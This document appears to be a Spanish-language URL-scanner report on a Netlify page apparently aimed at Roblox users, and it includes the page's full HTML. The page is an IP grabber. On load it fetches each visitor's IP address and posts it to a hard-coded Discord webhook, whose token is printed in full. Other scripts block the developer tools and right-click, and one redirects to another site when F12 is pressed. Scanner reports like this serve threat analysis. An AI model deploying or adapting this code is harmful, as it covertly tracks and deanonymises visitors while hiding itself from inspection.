- ID de exploración:
- 172c4e46-eedb-4de5-88bd-b49c36567620Finalizado
- URL enviada:
- https://rbxgeo.netlify.app/
- Informe finalizado:
Enlaces: 0 encontrados
Los enlaces salientes identificados en la página
Variables JavaScript: 5 encontradas
Las variables JavaScript globales cargadas en el objeto de ventana de una página son variables declaradas fuera de las funciones y a las que se puede acceder desde cualquier lugar del código en el ámbito actual
Nombre | Tipo |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
sendToDiscord | function |
disableRightClick | function |
Mensajes de registro de la consola: 4 encontrados
Mensajes registrados en la consola web
Tipo | Categoría | Registrar |
---|---|---|
error | network |
|
log | other |
|
error | network |
|
error | other |
|
HTML
El cuerpo HTML sin procesar de la página
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>You'Re Coocked :D</title>
</head>
<body>
<h1></h1>
<script>
// Replace this with your Discord webhook URL
const webhookURL = 'https://discord.com/api/webhooks/1285137384803012618/f4socKKRgToMG-Giq-JnU-hy16hSxIBBp4wViGj_KQJaGTnoezEmc-XrY0LLsRgxwh4C';
// Function to send the IP address to the Discord webhook
function sendToDiscord(ip) {
const data = {
content: `User's IP Address: ${ip}`,
};
// Send IP to the Discord webhook via POST request
fetch(webhookURL, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => {
if (response.ok) {
console.log('IP sent to Discord successfully.');
} else {
console.error('Failed to send IP to Discord.');
}
})
.catch(error => console.error('Error:', error));
}
// Get user's IP using the ipify API
fetch('https://api.ipify.org?format=json')
.then(response => response.json())
.then(data => {
const ip = data.ip;
console.log('User IP Address:', ip);
// Send the IP to the Discord webhook
sendToDiscord(ip);
})
.catch(error => console.error('Error fetching IP:', error));
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<h1></h1>
<script>
// Listen for keydown events
document.addEventListener('keydown', function(event) {
// Check if F12 (keyCode 123) is pressed
if (event.key === "F12" || event.keyCode === 123) {
// Prevent the default action of opening the developer tools
event.preventDefault();
// Redirect to Google
window.location.href = 'https://tynauri.net';
}
});
// Optional: Detect right-click to prevent inspecting elements via context menu
document.addEventListener('contextmenu', function(event) {
event.preventDefault(); // Disable right-click
});
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<script>
// Function to disable right-click
function disableRightClick(event) {
event.preventDefault(); // Prevent the default context menu from appearing
alert("Right-click is disabled on this page."); // Optional alert
}
// Attach the event listener when the page loads
window.onload = function() {
document.addEventListener('contextmenu', disableRightClick);
};
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Disable Inspect Methods</title>
<script>
// Disable right-click and keyboard shortcuts
document.addEventListener('contextmenu', function(event) {
event.preventDefault(); // Disable right-click
});
document.addEventListener('keydown', function(event) {
if (event.key === 'F12' ||
(event.ctrlKey && (event.key === 'i' || event.key === 'u')) ||
(event.shiftKey && event.ctrlKey && event.key === 'i')) {
event.preventDefault(); // Disable F12 and Ctrl+Shift+I, Ctrl+U
}
});
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script>
document.addEventListener('keydown', function(event) {
// Check if Ctrl + Shift + I is pressed
if (event.ctrlKey && event.shiftKey && event.key === 'I') {
event.preventDefault(); // Prevent the default action
alert("Developer Tools are disabled on this page.");
}
});
</script>
</body></html>